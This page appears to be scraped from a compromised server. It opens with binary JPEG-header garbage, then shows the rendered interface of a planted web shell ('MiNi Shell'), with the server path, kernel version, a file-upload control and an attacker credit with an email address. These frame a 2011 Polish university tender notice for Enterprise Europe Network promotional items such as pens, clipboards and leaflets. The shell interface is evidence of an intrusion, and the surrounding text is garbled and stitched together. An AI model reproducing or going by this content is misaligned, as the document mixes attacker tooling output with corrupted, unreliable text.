JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/316175-N-2011.html

<p class="kh_header"><b>Olsztyn: Opracowanie, produkcja i dostawa materiałów promocyjnych projektu Bussiness and Innovation Support for North - East Poland w ramach sieci Enterprise Europe Network</b><br>
<b>Numer ogłoszenia: 316175 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie, produkcja i dostawa materiałów promocyjnych projektu Bussiness and Innovation Support for North - East Poland w ramach sieci Enterprise Europe Network.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1. Wykonanie materiałów promocyjnych
Część nr 2.Wykonannie projektu oraz druk ulotek

1.	Logo Enterprise Europe Network (EEN)
Nie można zmieniać proporcji logo oraz pominąć jakikolwiek element logo. Logo do wysokości 15 mm musi uwzględniać slogan WSPARCIE BIZNESU W ZASIĘGU RĘKI. Większe loga mogą występować bez przedmiotowego sloganu. 
Kolory logo EEN
a.	Preferowane jest drukowanie logo EEN w Kolorza zawsze gdy możliwe jest zachowanie jakości druku przy nasyceniu barw: żółty cyan-0%; Magenta- 20%; Yellow- 100%; Black- 0% niebieski cyan-100%; Magenta - 80%; yellow-0%; Black-0% czarny cyan-0%; yellow - 0%; Magenta-0%; Black 100%
b.	W przypadku druków czarno - białych jeśli to możliwe należy wykorzystać możliwość zastosowania zróżnicowanej tonacji dla odróżnienia. 

2.	Identyfikacja wizualna sieci EEN zbudowana jest na podstawie 4 elementów:
nazwa sieci - jest przedstawiona za pomocą nowoczesnego kroju pisma (z pogrubieniem) w celu odzwierciedlenia nowoczesności i dynamiki sieci
białe tło
łuk ozdobny
obraz

3.	Do opracowywania określonych rodzajów materiałów należy korzystać z dostępnych wzorców (ulotki, foldery itp.).

4.	Wskaźniki nasycenia barw :
podstawowe
Biały:
Cyan - 0%; Magenta - 0%; Yellow- 0%; Black - 0% R:255; G: 255; B-255
Czarny
Cyan - 0%; Magenta - 0%; Yellow- 0%; Black - 100% R:0; G: 0; B-0
Szary
Cyan - 0%; Magenta - 0%; Yellow- 5%; Black - 20% R:215; G: 215; B-210
Pomarańczowy
Cyan - 0%; Magenta - 50%; Yellow- 100%; Black - 0% R:255; G: 145; B-0
Zielony
Cyan - 40%; Magenta - 0%; Yellow- 100%; Black - 0% R:170; G: 200; B-10
Niebieski
Cyan - 60%; Magenta - 10%; Yellow- 0%; Black - 0% R:100; G: 180; B-230
Uzupełniające
Biały:
Cyan - 0%; Magenta - 0%; Yellow- 0%; Black - 0% R:255; G: 255; B-255
Czarny
Cyan - 0%; Magenta - 0%; Yellow- 0%; Black - 100% R:0; G: 0; B-0
Ciemny Szary
Cyan - 5%; Magenta - 5%; Yellow- 20%; Black - 40% R:170; G: 165; B-150
Ciemny Pomarańczowy
Cyan - 20%; Magenta - 60%; Yellow- 100%; Black - 10% R:190; G: 110; B-20
Ciemny Zielony
Cyan - 60%; Magenta - 10%; Yellow- 100%; Black - 30% R:90; G: 130; B-40
Ciemny Niebieski
Cyan - 100%; Magenta - 20%; Yellow- 0%; Black - 40% R: 0; G: 100; B-145

5.	Podstawą wizualizacji materiałów promocyjnych drukowanych jest podział przestrzeni na dwa równe obszary:  górny - kolorowy dolny - biały oddzielone łukiem ozdobnym. Marginesy są równe ze wszystkich stron i wynoszą: A0-80mm; A1-56mm; A2-40mm; A3-28mm; A4-20mm; A5-14mm; A6-10mm. w przypadku innych rozmiarów należy zastosować stosowne proporcje. 
6.	W dokumentach drukowanych kilkustronnych, pierwsza strona  powinna zawierać:
Logo EEN - powinno być największe ze wszystkich. Pozostałe loga powinny być umieszczone poziomo w jednej lub dwóch liniach (w zależności od formatu), w tym samym rozmiarze oraz w następującym porządku przyjmując porządek od lewej do prawej:
logo partnerów
logo Komisji Europejskiej Przedsiębiorstwa i Przemysł
Na ostatniej stronie powinno znajdować się logo programu Ramowego Konkurencyjności i Innowacji (CIP).
W przypadku dokumentów drukowanych jednostronnych logo CIP umieszczamy jako ostatnie.

Wszystkie Logo oraz wzory dokumentów zostaną przekazane wykonawcy niezwłocznie po jego wyborze..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu
oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy dostawy materiałów promocyjnych o wartości min. 20.000,00 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu
oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu
oceny spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje w zakresie ww. warunku od dokonania opisu sposobu
oceny spełnienia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą
podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale
lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią
wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem 2. Sporządzony przez wykonawcę Formularz ofertowy 3. Sporządzony
przez wykonawcę Formularz cenowy Zestawienie wymaganych parametrów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-	zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej,
-	zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uwm.edu.pl/zamowienia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, pok. 305, ul.
Oczapowskiego 2, Olsztyn 10 - 719.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie,
Dział Zamówień Publicznych, pok. 309, ul. Oczapowskiego 2, Olsztyn 10 - 719.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Regionalny System Wspierania Innowacji - IV edycja współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 ustawy prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie materiałów promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wieszak na torebki - sztuk 250:
- metalowy 
- górna powierzchnia w kolorze niebieskim
- wymiar 40x45 x 60-62 mm,
- grawer 1 strona - logo Enterprise Europe Network

2. Długopis drewniany - sztuk 500:
- drewno naturalne
- klips, końcówka oraz dolna część metal błysk
- średnica 1 cm
- długość 13 cm
- nadruk 2 stronny 1 kolor logo Enterprise Europe Network, UWM, CIiTT

3. Zegar metalowy na biurko z miejscem na długopisy - sztuk 250:
- szeroka ramka z drewna
- kształt kwadratowy,
- wymiary: 121x151x40 mm
- grawer - Enterprise Europe Network, UWM
	
4. Blok notesowy - sztuk 500:
- projekt indywidualny/cmyk - według wskazań i materiałów przekazanych przez zamawiającego 
- format A4
- 50 kartek 
- grubość papieru 80g

5. Clipboard - sztuk 500:
-  projekt indywidualny/cmyk - - według wskazań i materiałów przekazanych przez zamawiającego 2
- A4/podwójny - zamykany
- grzbiet o szerokości 2cm
- okleina zewnętrzna cmyk
- tektura lita 2,0mm
- foliowanie okleiny błyszczące
- wklejka wewnątrz biała
- zapięcie/klips druciany metal błysk
	
6. Zestaw znaczników foliowych w okładce - sztuka 500:
- okładka 300g,ok 80x135 mm
- nadruk na okładce cmyk 2 strony - według wskazań i materiałów przekazanych przez zamawiającego 2 dni po wybraniu wykonawcy. 
- uszlachetnienie folia błyszcząca
- 1 notes samoprzylepny format 70x75mm zamocowany do okładki
- 50 kartek, papier offset 80g,nadruk cmyk - według wskazań i materiałów przekazanych przez zamawiającego 
- 5 kolorowe znaczniki 12 x 45mm klejone, zamocowane do okładki
- po 25 kartek każdego koloru
- jednostkowo pakowane w woreczki celofanowe
	
7. Osłona przeciwsłoneczna do samochodu - sztuka 500:
- siatka w kolorze czarnym
- mocowanie - przyssawka
- nadruk 1kolor - logo Enterprise Europe Network, UWM, CIiTT, CIP, KE
- komplet zawiera 2 szt.
- wymiar 43x38 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonannie projektu oraz druk ulotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie projektu oraz druk ulotek - sztuka 1000:
1.	Ulotka kolorowa
2.	Papier min. 110 gram z połyskiem
3.	Format A4
4.	Trójdzielna, dwustronna
5.	Ulotki muszą być wykonane zgodnie ze standardami Enterprise Europe Network. Dodatkowo powinny być uwzględnione loga UWM i CIiTT - zgodnie z wymaganiami Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com